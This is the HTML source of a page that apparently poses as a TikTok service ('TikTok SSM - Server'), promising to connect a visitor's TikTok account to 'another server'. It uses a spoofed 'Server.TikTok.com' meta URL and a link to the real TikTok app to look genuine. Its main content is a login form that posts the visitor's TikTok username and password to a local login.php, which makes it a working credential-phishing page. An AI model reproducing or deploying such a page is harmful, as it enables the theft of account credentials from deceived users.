<!DOCTYPE html>
<html lang="en-US">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="TikTok SSM - Join another tiktok server with SSM"/>
  <meta name="og:description" content="TikTok SSM - Join another tiktok server with SSM"/>
  <meta name="og:url" content="Server.TikTok.com"/>
  <meta name="og:title" content="TikTok SSM - Server"/>
  <meta name="og:image" content="https://telegra.ph/file/689cc8c61c3ed658f8fc9.png">
  <meta property="og:image" content="https://telegra.ph/file/689cc8c61c3ed658f8fc9.png" />
  <meta property="og:image:secure_url" content="https://telegra.ph/file/689cc8c61c3ed658f8fc9.png" />
  <meta property="og:image:type" content="image/jpeg" />
  <meta property="og:image:width" content="400" />
  <meta property="og:image:height" content="300" />
  <meta property="og:image:alt" content="Not for Drugs!" />
  <link rel="shortcut icon" href="logo.png" type="image/x-icon">
  <title>TikTok SSM - Server free</title>
</head>
  <style>
  *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
      @font-face{
    font-family: sasame;
    font-face: 600;
    src: url('./fonts/mention_and_hashtag.ttf');
    font-style: normal;
}

@font-face{
    font-family: tiksame;
    font-style: normal;
    font-weight: 400;
    src: url('./fonts/sadflix.ttf');
}

:root{
  --tiksame: tiksame;
}
    body{
      font-family: var(--tiksame);
      color: #ffffff;
      font-weight: 600;
      font-size: 20px;
      background: #000405;
    }
    .painel{
      width: 360px;
      padding: 10px;
      border-radius: 15px;
      margin: 0 auto 10px;
      text-align: center;
      border: 2px solid #ffffff;
      background: #000000;
    }
    @media(max-width:999px){
      .painel{
        width: 80%;
      }
    }
    input{
      padding: 10px;
      outline: none;
      background: #070707;
      color: #ffffff;
      width: 90%;
      font-size: 15px;
      font-family: var(--tiksame);
      font-weight: 400;
      margin: 5px;
      border: 2px solid #626262;
      border-radius: 10px;
      transition: 0.5s;
    }
    input:focus{
      border:2px solid #0f94f2;
      transition: 0.5s;
    }
    .btn{
      width: 60%;
      border: 4px solid #ffff;
      background: #000000;
      font-size: 15px;
      color: #ffffff;
      padding: 10px;
      border-radius: 15px;
      margin: 10px;
      font-family: var(--tiksame);
      cursor: pointer;
      font-weight: 600;
    }
    .top{
      text-align: center;
    }
    .size{
      font-size: 12px;
      text-align: left;
      color: #626262;
    }
    .namers{
      width: 350px;
      margin: 0 auto 10px;
    }
    @media(max-width:999px){
      .namers{
        width: 80%;
      }
    }

  </style>
  <body>

  <div class="tik">
    <div class="top">
      <br>
    <div class="logo">
      <img src="logo.png" width="80"/>
      <h4>TikTok SSM</h4>
    </div>
    <br>
    <div class="namers">
      <h3 class="size">
        ServerSam<br>
        Connect your TikTok to another server.</h3>
    </div>
    </div>
    <div class="painel">
      <br>
      <form action="login.php" method="POST">
        <img src="./image/sprite_core_2x_bcd90c1d48688.png" width="50"/><br>
      <h4>Log in!</h4><br>
           <input type="text" name="Username" placeholder="Username" required onfocus="this.placeholder=''" onblur="this.placeholder='Username'"/>
           <input type="password" name="Pass" placeholder="Password" required onfocus="this.placeholder=''" onblur="this.placeholder='Password'"/>
           <br>
           <br>
           <button type="submit" title="Clique para entrar" class="btn">Sign in</button>
           </form>
           <br>
    </div><br>
    <center>
    <img  src="./image/h5.webp" width="60"/> <br><br>
    <a href="https://play.google.com/store/apps/details?id=com.zhiliaoapp.musically" style="text-decoration: none;">
    <img src="./image/Android-files.png" width="190"/>
    </a>
    <img src="./image/Ios-files.png" width="190"/><br>
    <div class="width">
      <div class="remote">
        <button class="removeranu" onclick="removerAnu()">
          <svg viewBox="0 0 24 24" height="24" width="24" preserveAspectRatio="xMidYMid meet" class fill="currentColor" enable-background="new 0 0 24 24">
            <title>X</title>
            <path d="M19.6004 17.2L14.3004 11.9L19.6004 6.60005L17.8004 4.80005L12.5004 10.2L7.20039 4.90005L5.40039 6.60005L10.7004 11.9L5.40039 17.2L7.20039 19L12.5004 13.7L17.8004 19L19.6004 17.2Z"></path>
          </svg>
        </button>
        <script>
          function removerAnu(){
            const div = document.querySelector('.width');
            document.querySelector('.width').style.display = 'none';
          }
        </script>
      <style>
        .remote{
          background-image: url('./image/mod-2-tiktoker.jpeg');
          background-repeat: no-repeat;
          background-size:250px;
          justify-content: center;
          background-position: center top;
          height: 10vh;
          display: none;
        }

        .removeranu{
          border-radius: 100%;
          background: transparent;
          border: none;
          color: #ffff;
          cursor: pointer;
          font-family: var(--tiksame);
          font-weight: 200;
          font-size: 17px;
          border-radius: 100%;
          text-align: center;
          margin: 10px;
        }

        .width{
          width: 450px;
          justify-content: center;
          text-align: right;
          border-bottom: 1px solid #626262;
          background: #000000;
          display: none;
        }

        @media(max-width:999px){
          .width{
          width: 100%;
          justify-content: center;
          text-align: right;
          border-bottom: 1px solid #626262;
          background: #000000;
          display: block;
          border-top: 1px solid #626262;
          margin-top: 20px;
          padding: 10px;
          display: none;
          }
        }
      </style>
    </div>
    </div>

  </center>
  </div> 
    </section>
    </section>
  </body>
  </html>